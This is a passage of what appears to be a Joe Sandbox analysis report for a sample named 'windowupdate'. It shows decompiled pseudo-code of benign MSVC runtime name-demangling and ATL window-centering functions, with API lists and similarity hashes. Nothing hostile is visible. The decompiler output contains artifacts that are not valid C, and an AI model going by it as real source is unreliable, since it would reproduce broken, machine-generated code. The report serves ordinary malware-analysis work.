                      								__ecx = 0xffffffffffffffff;
                      								__edx =  *0xf20640; // 0x0
                      								__eax =  *(__edx + 0xffffffffffffffff);
                      								__ecx = 0xdc8958 +  *(__edx + 0xffffffffffffffff) * 8;
                      								_t74 =  &_v136; // -131
                      								__ecx = _t74;
                      								__eax = E00D4F1F0(_t74, 0xdc8958 +  *(__edx + 0xffffffffffffffff) * 8);
                      								_t75 =  &_v136; // -131
                      								__ecx = _t75;
                      								__eax = E00D5AB30(_t75);
                      								_t76 =  &_v136; // -131
                      								__edx = _t76;
                      								__ecx = _a4;
                      								E00D4F240(_a4, _t76) = _a4;
                      								return _a4;
                      							case 4:
                      								__edx =  *0xf20640;
                      								__eax =  *( *0xf20640);
                      								_v120 =  *( *0xf20640);
                      								 *0xf20640 =  *0xf20640 + 1;
                      								 *0xf20640 =  *0xf20640 + 1;
                      								__edx = _v120;
                      								_v56 = _v120;
                      								__eflags = _v56;
                      								if(_v56 == 0) {
                      									 *0xf20640 =  *0xf20640 - 1;
                      									 *0xf20640 =  *0xf20640 - 1;
                      									__ecx = _a4;
                      									E00D4F350(_a4, 1) = _a4;
                      									return _a4;
                      								}
                      								__eflags = _v56 - 0x30;
                      								if(_v56 == 0x30) {
                      									_push(0);
                      									__ecx =  &_v152;
                      									__eax = E00D57F80(__ebx, __edi, __esi,  &_v152, 1);
                      									__ecx =  &_v152;
                      									__eax = E00D5AAC0( &_v152);
                      									__edx =  &_v152;
                      									__ecx = _a4;
                      									E00D4F240(_a4,  &_v152) = _a4;
                      									return _a4;
                      								}
                      								__ecx = _a4;
                      								E00D4F350(_a4, 2) = _a4;
                      								return _a4;
                      							case 5:
                      								__edx = 1;
                      								__eax = 0xffffffffffffffff;
                      								__ecx =  *0xf20640;
                      								__edx =  *( *0xf20640 + 0xffffffffffffffff);
                      								__eax = 0xdc8920 +  *( *0xf20640 + 0xffffffffffffffff) * 8;
                      								__ecx = _a4;
                      								E00D4F1F0(_a4, 0xdc8920 +  *( *0xf20640 + 0xffffffffffffffff) * 8) = _a4;
                      								return _a4;
                      							case 6:
                      								_push(1);
                      								 &_v144 = E00D57F80(__ebx, __edi, __esi,  &_v144, 0);
                      								__ecx =  &_v144;
                      								__eax = E00D5AAC0( &_v144);
                      								__ecx =  &_v144;
                      								__ecx = _a4;
                      								E00D4F240(_a4,  &_v144) = _a4;
                      								return _a4;
                      							case 7:
                      								__ecx = 1;
                      								__edx = 0xffffffffffffffff;
                      								__eax =  *0xf20640;
                      								__ecx =  *( *0xf20640 + 0xffffffffffffffff);
                      								__edx = 0xdc8920 +  *( *0xf20640 + 0xffffffffffffffff) * 8;
                      								__ecx =  &_v12;
                      								E00D4F7E0( &_v12, 0xdc8920 +  *( *0xf20640 + 0xffffffffffffffff) * 8) =  &_v224;
                      								__eax = E00D55E80(__ebx, __edi, __esi,  &_v224, 0, 0);
                      								__ecx =  &_v36;
                      								__eax = E00D4F820( &_v36, __eax);
                      								__ecx =  &_v36;
                      								__eax = E00D5A560( &_v36);
                      								__eflags = __eax;
                      								if(__eax != 0) {
                      									L31:
                      									__ecx =  &_v36;
                      									__edx = _a4;
                      									__ecx =  &_v12;
                      									E00D4FB70( &_v12, _a4,  &_v36) = _a4;
                      									return _a4;
                      								}
                      								__ecx =  &_v36;
                      								__eax = E00D5A660( &_v36);
                      								__eflags = __eax;
                      								if(__eax == 0) {
                      									goto L31;
                      								}
                      								__ecx = _a4;
                      								E00D4F350(_a4, 2) = _a4;
                      								return _a4;
                      							case 8:
                      								goto L72;
                      							case 9:
                      								__eax = 1;
                      								__ecx = 0xffffffffffffffff;
                      								__edx =  *0xf20640;
                      								__eax =  *( *0xf20640 + 0xffffffffffffffff);
                      								__ecx = 0xdc8920 +  *( *0xf20640 + 0xffffffffffffffff) * 8;
                      								__ecx =  &_v12;
                      								__eax = E00D4F7E0( &_v12, 0xdc8920 +  *( *0xf20640 + 0xffffffffffffffff) * 8);
                      								__edx = 1;
                      								__eax = 0;
                      								__ecx =  *0xf20640;
                      								__edx =  *__ecx;
                      								__eflags =  *__ecx;
                      								if( *__ecx != 0) {
                      									__ecx = 1;
                      									__edx = 0;
                      									__eax =  *0xf20640;
                      									__ecx =  *__eax;
                      									__ecx =  *__eax - 0x30;
                      									__eflags = __ecx;
                      									_v20 = __ecx;
                      									if(__ecx < 0) {
                      										L37:
                      										__ecx = _a4;
                      										E00D4F350(_a4, 2) = _a4;
                      										return _a4;
                      									}
                      									__eflags = _v20 - 5;
                      									if(_v20 < 5) {
                      										__edx = _v20;
                      										__eax = 0xdc8c60 + _v20 * 8;
                      										__ecx =  &_v36;
                      										__eax = E00D4F7E0( &_v36, 0xdc8c60 + _v20 * 8);
                      										__ecx =  *0xf20640;
                      										__edx =  *( *0xf20640);
                      										_v92 =  *( *0xf20640);
                      										 *0xf20640 =  *0xf20640 + 1;
                      										 *0xf20640 =  *0xf20640 + 1;
                      										__ecx = _v92;
                      										_v24 = _v92;
                      										_v24 = _v24 - 0x30;
                      										_v24 = _v24 - 0x30;
                      										__eflags = _v24 - 4;
                      										if(__eflags > 0) {
                      											 *0xf20640 =  *0xf20640 - 1;
                      											 *0xf20640 =  *0xf20640 - 1;
                      											__ecx = _a4;
                      											E00D4F350(_a4, 1) = _a4;
                      											return _a4;
                      										}
                      										__eax = _v24;
                      										switch( *((intOrPtr*)(_v24 * 4 +  &M00D56934))) {
                      											case 0:
                      												__ecx =  &_v184;
                      												__eax = E00D54380(__ebx, __edi, __esi, __eflags,  &_v184, 0);
                      												__edx =  &_v232;
                      												__ecx =  &_v184;
                      												_v96 = E00D4FBB0( &_v184,  &_v232, 0x20);
                      												__eax =  &_v12;
                      												__ecx =  &_v240;
                      												__ecx = _v96;
                      												_v100 = E00D4FB70(_v96,  &_v240,  &_v12);
                      												__edx =  &_v36;
                      												__eax = _a4;
                      												__ecx = _v100;
                      												E00D4FB70(_v100, _a4,  &_v36) = _a4;
                      												return _a4;
                      											case 1:
                      												__ecx =  &_v36;
                      												__edx =  &_v68;
                      												__ecx =  &_v12;
                      												E00D4FB70( &_v12,  &_v68,  &_v36) =  &_v248;
                      												_v104 = E00D57C80(__ebx, __edi, __esi,  &_v248);
                      												__ecx =  &_v256;
                      												__ecx = _v104;
                      												__eax = E00D4FBB0(_v104,  &_v256, 0x2c);
                      												__ecx =  &_v68;
                      												__eax = E00D4FD40( &_v68, __eax);
                      												__edx =  &_v264;
                      												_v108 = E00D57C80(__ebx, __edi, __esi,  &_v264);
                      												__eax =  &_v272;
                      												__ecx = _v108;
                      												__eax = E00D4FBB0(_v108,  &_v272, 0x2c);
                      												__ecx =  &_v68;
                      												__eax = E00D4FD40( &_v68, __eax);
                      												__ecx =  &_v280;
                      												_v112 = E00D57C80(__ebx, __edi, __esi,  &_v280);
                      												__edx =  &_v288;
                      												__ecx = _v112;
                      												__eax = E00D4FBB0(_v112,  &_v288, 0x2c);
                      												__ecx =  &_v68;
                      												__eax =  &_v296;
                      												_v116 = E00D54900(__ebx, __edi, __esi,  &_v296, 0);
                      												__ecx =  &_v304;
                      												__ecx = _v116;
                      												__eax = E00D4FBB0(_v116,  &_v304, 0x29);
                      												__ecx =  &_v68;
                      												__eax = E00D4FD40( &_v68, __eax);
                      												__edx = _a4;
                      												__ecx =  &_v68;
                      												E00D4FBB0( &_v68, _a4, 0x27) = _a4;
                      												return _a4;
                      											case 2:
                      												__eax =  &_v36;
                      												__ecx = _a4;
                      												__ecx =  &_v12;
                      												E00D4FB70( &_v12, _a4,  &_v36) = _a4;
                      												return _a4;
                      										}
                      									}
                      									goto L37;
                      								}
                      								__eax = _a4;
                      								__ecx =  &_v12;
                      								E00D4FC30( &_v12, _a4, 1) = _a4;
                      								return _a4;
                      							case 0xa:
                      								__eax = 1;
                      								__ecx = 0xffffffffffffffff;
                      								__edx =  *0xf20640;
                      								__eax =  *( *0xf20640 + 0xffffffffffffffff);
                      								__ecx = 0xdc8920 +  *( *0xf20640 + 0xffffffffffffffff) * 8;
                      								__ecx =  &_v12;
                      								__eax = E00D4F7E0( &_v12, 0xdc8920 +  *( *0xf20640 + 0xffffffffffffffff) * 8);
                      								L72:
                      								L74:
                      								__eflags = _v60;
                      								if(_v60 == 0) {
                      									_t244 =  &_v12; // -7
                      									__ecx = _t244;
                      									__eax = E00D5A560(_t244);
                      									__eflags = __eax;
                      									if(__eax == 0) {
                      										_v176 = E00D50060("operator", 8);
                      										_v172 = __edx;
                      										_t247 =  &_v12; // -7
                      										__ecx = _t247;
                      										_t248 =  &_v176; // -171
                      										__edx = _t248;
                      										_t249 =  &_v328; // -323
                      										_t249 = E00D4FAA0(_t249, _t248, _t247);
                      										_t250 =  &_v12; // -7
                      										__ecx = _t250;
                      										__eax = E00D4F820(_t250, __eax);
                      									}
                      								} else {
                      									_t243 =  &_v12; // -7
                      									__ecx = _t243;
                      									__eax = E00D5AB00(_t243);
                      								}
                      								_t251 =  &_v12; // -7
                      								__ecx = _t251;
                      								__ecx = _a4;
                      								E00D4F240(_a4, _t251) = _a4;
                      								return _a4;
                      							case 0xb:
                      								__eax =  *0xf20640;
                      								__ecx =  *( *0xf20640);
                      								_v128 =  *( *0xf20640);
                      								 *0xf20640 =  *0xf20640 + 1;
                      								 *0xf20640 =  *0xf20640 + 1;
                      								__eax = _v128;
                      								_v28 = _v128;
                      								_v28 = _v28 - 0x41;
                      								_v28 = _v28 - 0x41;
                      								__eflags = _v28 - 0xd;
                      								if(_v28 > 0xd) {
                      									__ecx = _a4;
                      									E00D4F350(_a4, 2) = _a4;
                      									return _a4;
                      								}
                      								__edx = _v28;
                      								switch( *((intOrPtr*)(_v28 * 4 +  &M00D56948))) {
                      									case 0:
                      										__eax = 1;
                      										__ecx = 0xffffffffffffffff;
                      										__edx =  *0xf20640;
                      										__eax =  *( *0xf20640 + 0xffffffffffffffff);
                      										__ecx = 0xdc89e8 +  *( *0xf20640 + 0xffffffffffffffff) * 8;
                      										__ecx = _a4;
                      										E00D4F1F0(_a4, 0xdc89e8 +  *( *0xf20640 + 0xffffffffffffffff) * 8) = _a4;
                      										return _a4;
                      									case 1:
                      										__edx = 1;
                      										__eax = 0xffffffffffffffff;
                      										__ecx =  *0xf20640;
                      										__edx =  *( *0xf20640 + 0xffffffffffffffff);
                      										__eax = 0xdc89e8 +  *( *0xf20640 + 0xffffffffffffffff) * 8;
                      										__ecx =  &_v76;
                      										__eax = E00D4F1F0( &_v76, 0xdc89e8 +  *( *0xf20640 + 0xffffffffffffffff) * 8);
                      										__ecx =  *0xf20640;
                      										__edx =  *( *0xf20640);
                      										__eflags =  *( *0xf20640) - 0x3f;
                      										if(__eflags != 0) {
                      											__ecx =  &_v320;
                      											__eax = E00D58180( &_v320);
                      											__ecx =  &_v76;
                      											__eax = E00D4FD40( &_v76, __eax);
                      										} else {
                      											 &_v312 = E00D544C0(__ebx, __edi, __esi, __eflags,  &_v312);
                      											__ecx =  &_v76;
                      											__eax = E00D4FD40( &_v76, __eax);
                      											__ecx =  *0xf20640;
                      											__edx =  *( *0xf20640);
                      											__eflags =  *( *0xf20640) - 0x40;
                      											if( *( *0xf20640) == 0x40) {
                      												__eax =  *0xf20640;
                      												__eax =  *0xf20640 + 1;
                      												__eflags = __eax;
                      												 *0xf20640 = __eax;
                      											}
                      										}
                      										_v160 = E00D50060("\'\'", 2);
                      										_v156 = __edx;
                      										__edx =  &_v160;
                      										__ecx =  &_v76;
                      										E00D4FCA0( &_v76,  &_v160) =  &_v76;
                      										__ecx = _a4;
                      										E00D4F240(_a4,  &_v76) = _a4;
                      										return _a4;
                      									case 2:
                      										__ecx = 1;
                      										__edx = 0xffffffffffffffff;
                      										__eflags = 0xffffffffffffffff;
                      										__eax =  *0xf20640;
                      										__ecx =  *( *0xf20640 + 0xffffffffffffffff);
                      										__edx = 0xdc89e8 +  *( *0xf20640 + 0xffffffffffffffff) * 8;
                      										__ecx =  &_v168;
                      										__eax = E00D4F1F0( &_v168, 0xdc89e8 +  *( *0xf20640 + 0xffffffffffffffff) * 8);
                      										while(1) {
                      											__eax =  *0xf20640;
                      											__ecx =  *( *0xf20640);
                      											__eflags =  *( *0xf20640);
                      											if( *( *0xf20640) == 0) {
                      												break;
                      											}
                      											__edx =  *0xf20640;
                      											__eax =  *( *0xf20640);
                      											__eflags =  *( *0xf20640) - 0x40;
                      											if( *( *0xf20640) == 0x40) {
                      												break;
                      											}
                      											__ecx =  *0xf20640;
                      											_v13 =  *( *0xf20640);
                      											 *0xf20640 =  *0xf20640 + 1;
                      											 *0xf20640 =  *0xf20640 + 1;
                      											__ecx = _v13 & 0x000000ff;
                      											__ecx =  &_v168;
                      											__eax = E00D4FDE0( &_v168, _v13 & 0x000000ff);
                      										}
                      										__edx =  *0xf20640;
                      										__eax =  *( *0xf20640);
                      										__eflags =  *( *0xf20640) - 0x40;
                      										if( *( *0xf20640) == 0x40) {
                      											__ecx =  *0xf20640;
                      											__ecx =  *0xf20640 + 1;
                      											__eflags = __ecx;
                      											 *0xf20640 = __ecx;
                      										}
                      										__edx =  &_v168;
                      										__ecx = _a4;
                      										E00D4F240(_a4,  &_v168) = _a4;
                      										return _a4;
                      									case 3:
                      										__eax =  *0xf20640;
                      										__ecx =  *( *0xf20640);
                      										_v124 =  *( *0xf20640);
                      										 *0xf20640 =  *0xf20640 + 1;
                      										 *0xf20640 =  *0xf20640 + 1;
                      										__eflags = _v124 - 0x32;
                      										if(_v124 != 0x32) {
                      											__ecx = _a4;
                      											E00D4F350(_a4, 2) = _a4;
                      											return _a4;
                      										}
                      										_a4 = E00D59D50(__ebx, __edi, __esi, _a4);
                      										__eax = _a4;
                      										return _a4;
                      								}
                      							case 0xc:
                      								goto L71;
                      						}
                      					case 6:
                      						goto L73;
                      				}
                      			}

                      APIs
                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00D55E8C
                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00D55E94
                      • DName::DName.LIBVCRUNTIMED ref: 00D55EF4
                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00D55F04
                      • operator+.LIBVCRUNTIMED ref: 00D55F2E
                      • DName::operator+=.LIBCMTD ref: 00D55F54
                      • DName::operator+=.LIBCMTD ref: 00D55F5E
                      • Mailbox.LIBCMTD ref: 00D55F82
                      • DName::DName.LIBVCRUNTIMED ref: 00D560DD
                      • DName::DName.LIBVCRUNTIMED ref: 00D567AC
                      • DName::setIsUDC.LIBCMTD ref: 00D567BF
                      • DName::isEmpty.LIBCMTD ref: 00D567C9
                      • operator+.LIBVCRUNTIMED ref: 00D567FF
                      • Mailbox.LIBCMTD ref: 00D5680B
                      • Mailbox.LIBCMTD ref: 00D56817
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Iterator_baseIterator_base::_MailboxNameName::std::_$Name::operator+=operator+$EmptyName::isName::set
                      • String ID: _$operator
                      • API String ID: 2065213285-3322683124
                      • Opcode ID: cf30efdd80b62d11f4a8ccc7dd9c91664884c98621e047e16abf77dfd2ac49b0
                      • Instruction ID: 5769d35c424a186be787e3a703d5749ccf2584a1c5351038c1a5eb10a70d4634
                      • Opcode Fuzzy Hash: cf30efdd80b62d11f4a8ccc7dd9c91664884c98621e047e16abf77dfd2ac49b0
                      • Instruction Fuzzy Hash: F9A190719001199BDB18EF64D891EED7F75FF44301F448169ED069B2A2EB30AA49DBB0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 76%
                      			E00D44E60(void* __ebx, void* __ecx, void* __edi, void* __esi, struct HWND__* _a4) {
                      				signed int _v8;
                      				struct HWND__** _v12;
                      				signed int _v16;
                      				struct tagRECT _v36;
                      				struct tagRECT _v60;
                      				struct tagRECT _v84;
                      				struct HWND__* _v92;
                      				signed int _v96;
                      				struct HMONITOR__* _v100;
                      				struct HWND__* _v104;
                      				intOrPtr _v116;
                      				intOrPtr _v120;
                      				intOrPtr _v124;
                      				struct tagMONITORINFO _v148;
                      				struct HWND__* _v156;
                      				int _v160;
                      				intOrPtr _v164;
                      				intOrPtr _v168;
                      				int _v172;
                      				int _v176;
                      				struct HWND__* _v180;
                      				int _v184;
                      				signed int _t117;
                      				void* _t121;
                      				struct HWND__* _t127;
                      				int _t129;
                      				int _t131;
                      				int _t134;
                      				int _t137;
                      				int _t140;
                      				int _t157;
                      				void* _t158;
                      				void* _t160;
                      				int _t165;
                      				void* _t166;
                      				void* _t167;
                      				int _t171;
                      				void* _t173;
                      				int _t175;
                      				void* _t179;
                      				struct HWND__* _t187;
                      				void* _t191;
                      				void* _t192;
                      				struct HWND__** _t196;
                      				int _t218;
                      				int _t231;
                      				intOrPtr _t237;
                      				void* _t242;
                      				void* _t251;
                      				void* _t252;
                      				signed int _t267;
                      				void* _t268;
                      				void* _t269;
                      
                      				_t192 = __ebx;
                      				_push(__ecx);
                      				_t251 =  &_v184;
                      				memset(_t251, 0xcccccccc, 0x2d << 2);
                      				_t269 = _t268 + 0xc;
                      				_t252 = _t251 + 0x2d;
                      				_pop(_t196);
                      				_t117 =  *0xdf600c; // 0x71e60372
                      				_v8 = _t117 ^ _t267;
                      				_v12 = _t196;
                      				_t254 = _t269;
                      				_t121 = E00DC1520(IsWindow( *_v12), _t269 - _t269);
                      				_t272 = _t121;
                      				if(_t121 == 0) {
                      					_t191 = L00D84930(_t272, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0x812, 0, "%ls", L"::IsWindow(m_hWnd)");
                      					_t269 = _t269 + 0x18;
                      					if(_t191 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				_v16 = E00D44DE0(_v12, _t254);
                      				if(_a4 == 0) {
                      					if((_v16 & 0x40000000) == 0) {
                      						_t187 = GetWindow( *_v12, 4);
                      						__eflags = _t269 - _t269;
                      						_a4 = E00DC1520(_t187, __eflags);
                      					} else {
                      						_a4 = E00DC1520(GetParent( *_v12), _t269 - _t269);
                      					}
                      				}
                      				_t125 = E00DC1520(GetWindowRect( *_v12,  &_v36), _t269 - _t269);
                      				_t231 = _v16 & 0x40000000;
                      				if(_t231 != 0) {
                      					_t127 = GetParent( *_v12);
                      					__eflags = _t269 - _t269;
                      					_v92 = E00DC1520(_t127, _t269 - _t269);
                      					_t129 = IsWindow(_v92);
                      					__eflags = _t269 - _t269;
                      					__eflags = E00DC1520(_t129, _t269 - _t269);
                      					if(__eflags == 0) {
                      						_t167 = L00D84930(__eflags, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0x84a, 0, "%ls", L"::IsWindow(hWndParent)");
                      						_t269 = _t269 + 0x18;
                      						__eflags = _t167 - 1;
                      						if(_t167 == 1) {
                      							asm("int3");
                      						}
                      					}
                      					_t131 = GetClientRect(_v92,  &_v60);
                      					__eflags = _t269 - _t269;
                      					E00DC1520(_t131, _t269 - _t269);
                      					_t134 = IsWindow(_a4);
                      					__eflags = _t269 - _t269;
                      					__eflags = E00DC1520(_t134, _t269 - _t269);
                      					if(__eflags == 0) {
                      						_t166 = L00D84930(__eflags, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0x84d, 0, "%ls", L"::IsWindow(hWndCenter)");
                      						_t269 = _t269 + 0x18;
                      						__eflags = _t166 - 1;
                      						if(_t166 == 1) {
                      							asm("int3");
                      						}
                      					}
                      					_t137 = GetClientRect(_a4,  &_v84);
                      					__eflags = _t269 - _t269;
                      					E00DC1520(_t137, _t269 - _t269);
                      					_t140 = MapWindowPoints(_a4, _v92,  &_v84, 2);
                      					__eflags = _t269 - _t269;
                      					E00DC1520(_t140, _t269 - _t269);
                      					L45:
                      					_v164 = _v36.right - _v36.left;
                      					_t237 = _v36.bottom - _v36.top;
                      					_v168 = _t237;
                      					asm("cdq");
                      					asm("cdq");
                      					_v172 = (_v84.left + _v84.right - _t237 >> 1) - (_v164 - _t237 >> 1);
                      					asm("cdq");
                      					asm("cdq");
                      					_v176 = (_v84.top + _v84.bottom - _t237 >> 1) - (_v168 - _t237 >> 1);
                      					__eflags = _v172 + _v164 - _v60.right;
                      					if(_v172 + _v164 > _v60.right) {
                      						_t165 = _v60.right - _v164;
                      						__eflags = _t165;
                      						_v172 = _t165;
                      					}
                      					__eflags = _v172 - _v60.left;
                      					if(_v172 < _v60.left) {
                      						_v172 = _v60.left;
                      					}
                      					__eflags = _v176 + _v168 - _v60.bottom;
                      					if(_v176 + _v168 > _v60.bottom) {
                      						_t218 = _v60.bottom - _v168;
                      						__eflags = _t218;
                      						_v176 = _t218;
                      					}
                      					__eflags = _v176 - _v60.top;
                      					if(_v176 < _v60.top) {
                      						_v176 = _v60.top;
                      					}
                      					_t262 = _t269;
                      					_t231 = _v172;
                      					_t157 = SetWindowPos( *_v12, 0, _t231, _v176, 0xffffffff, 0xffffffff, 0x15);
                      					__eflags = _t269 - _t269;
                      					_t158 = E00DC1520(_t157, _t269 - _t269);
                      					L54:
                      					E00DC14C0(_t267, 0xd45304);
                      					_t160 = _t158;
                      					_t242 = _t231;
                      					return E00DC1520(E00D47280(_t160, _t192, _v8 ^ _t267, _t242, _t252, _t262), _t267 - _t269 + 0xb4);
                      				}
                      				if(_a4 == 0) {
                      					L12:
                      					_v100 = 0;
                      					if(_a4 == 0) {
                      						_t262 = _t269;
                      						_t231 =  *_v12;
                      						__imp__MonitorFromWindow(_t231, 2);
                      						__eflags = _t269 - _t269;
                      						_v100 = E00DC1520(_t125, __eflags);
                      					} else {
                      						_t262 = _t269;
                      						__imp__MonitorFromWindow(_a4, 2);
                      						_v100 = E00DC1520(_a4, _t269 - _t269);
                      					}
                      					do {
                      						if(_v100 == 0) {
                      							_v180 = 0;
                      						} else {
                      							_v180 = 1;
                      						}
                      						_v104 = _v180;
                      						_t286 = _v104;
                      						if(_v104 == 0) {
                      							_t179 = L00D84930(_t286, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0x838, 0, "%ls", L"__atl_condVal");
                      							_t269 = _t269 + 0x18;
                      							if(_t179 == 1) {
                      								asm("int3");
                      							}
                      						}
                      						if(_v104 == 0) {
                      							_t158 = 0;
                      							goto L54;
                      						}
                      						_t231 = 0;
                      						__eflags = 0;
                      					} while (0 != 0);
                      					_v148.cbSize = 0x28;
                      					_t262 = _t269;
                      					_t171 = GetMonitorInfoA(_v100,  &_v148);
                      					__eflags = _t269 - _t269;
                      					_v156 = E00DC1520(_t171, _t269 - _t269);
                      					while(1) {
                      						__eflags = _v156;
                      						if(_v156 == 0) {
                      							_v184 = 0;
                      						} else {
                      							_v184 = 1;
                      						}
                      						_t231 = _v184;
                      						_v160 = _t231;
                      						__eflags = _v160;
                      						if(__eflags == 0) {
                      							_t173 = L00D84930(__eflags, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0x83d, 0, "%ls", L"__atl_condVal");
                      							_t269 = _t269 + 0x18;
                      							__eflags = _t173 - 1;
                      							if(_t173 == 1) {
                      								asm("int3");
                      							}
                      						}
                      						__eflags = _v160;
                      						if(_v160 == 0) {
                      							break;
                      						}
                      						__eflags = 0;
                      						if(0 != 0) {
                      							continue;
                      						}
                      						_v60.left = _v148.rcWork;
                      						_v60.top = _v124;
                      						_v60.right = _v120;
                      						_v60.bottom = _v116;
                      						__eflags = _a4;
                      						if(_a4 != 0) {
                      							_t175 = GetWindowRect(_a4,  &_v84);
                      							__eflags = _t269 - _t269;
                      							E00DC1520(_t175, _t269 - _t269);
                      						} else {
                      							_v84.left = _v60.left;
                      							_v84.top = _v60.top;
                      							_v84.right = _v60.right;
                      							_v84.bottom = _v60.bottom;
                      						}
                      						goto L45;
                      					}
                      					_t158 = 0;
                      					goto L54;
                      				}
                      				_v96 = E00DC1520(GetWindowLongA(_a4, 0xfffffff0), _t269 - _t269);
                      				if((_v96 & 0x10000000) == 0) {
                      					L11:
                      					_a4 = 0;
                      					goto L12;
                      				}
                      				_t231 = _v96 & 0x20000000;
                      				if(_t231 == 0) {
                      					goto L12;
                      				}
                      				goto L11;
                      			}

                      APIs
                      • IsWindow.USER32 ref: 00D44E94
                      • GetParent.USER32 ref: 00D44EEE
                      • GetWindow.USER32(?,00000004), ref: 00D44F0A
                      • GetWindowRect.USER32 ref: 00D44F26
                      • GetWindowLongA.USER32 ref: 00D44F50
                      • MonitorFromWindow.USER32(00000000,00000002), ref: 00D44F92
                      • MonitorFromWindow.USER32(?,00000002), ref: 00D44FAE
                      • GetMonitorInfoA.USER32 ref: 00D45037
                      • GetWindowRect.USER32 ref: 00D450FA
                      • GetParent.USER32 ref: 00D45114
                      • IsWindow.USER32(?), ref: 00D4512A
                      • GetClientRect.USER32 ref: 00D4516B
                      • IsWindow.USER32(00000000), ref: 00D4517E
                      • GetClientRect.USER32 ref: 00D451BF
                      • MapWindowPoints.USER32 ref: 00D451DC
                      • SetWindowPos.USER32(?,00000000,?,?,000000FF,000000FF,00000015,?,?,?), ref: 00D452C7
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00D452DE
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Window$Rect$Monitor$ClientFromParent$CheckInfoLongPointsStackVars@8
                      • String ID: %ls$($::IsWindow(hWndCenter)$::IsWindow(hWndParent)$::IsWindow(m_hWnd)$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h$__atl_condVal
                      • API String ID: 1557619299-489089659
                      • Opcode ID: 4da4b40ada9b12289e159a61fe7bd20a984f9b46e95695aa934aaf0f59e9e997
                      • Instruction ID: e4b92badaa4aea6943a1b7a1c60fbf552a3a1f6431f85efa8740e4261bc45064
                      • Opcode Fuzzy Hash: 4da4b40ada9b12289e159a61fe7bd20a984f9b46e95695aa934aaf0f59e9e997
                      • Instruction Fuzzy Hash: 94D14175E00319AFCB24EFA8D886B9DB7B1EF45310F148258F509AB286D7749D84CFA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00D56AB0(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                      				intOrPtr _v8;
                      				signed int _v12;
                      				char _v20;
                      				signed int _v24;
                      				char _v28;
                      				signed int _v32;
                      				char _v36;
                      				signed int _v40;
                      				char _v44;
                      				signed int _v48;
                      				char _v52;
                      				signed int _v56;
                      				char _v60;
                      				signed int _v64;
                      				char _v68;
                      				char _v76;
                      				char _v84;
                      				char _v92;
                      				char _v100;
                      				signed int _t93;
                      
                      				E00D4F3F0( &_v20);
                      				_t93 =  *0xf20640; // 0x0
                      				_v8 =  *_t93;
                      				if(_v8 > 0x42) {
                      					L28:
                      					E00D52CD0(_a4, _a8);
                      					return _a4;
                      				}
                      				_t5 = _v8 + 0xd56e6c; // 0x6e189003
                      				switch( *((intOrPtr*)(( *_t5 & 0x000000ff) * 4 +  &M00D56E58))) {
                      					case 0:
                      						E00D4FB00(_t112, _a4, 1, _a8);
                      						return _a4;
                      					case 1:
                      						1 = 1 << 0;
                      						__ecx =  *0xf20640; // 0x0
                      						__edx =  *((char*)(__ecx + (1 << 0)));
                      						__eflags =  *((char*)(__ecx + (1 << 0))) - 0x24;
                      						if( *((char*)(__ecx + (1 << 0))) == 0x24) {
                      							__edx =  *0xf20640; // 0x0
                      							 *0xf20640 = __edx;
                      							__eax =  *0xf20640; // 0x0
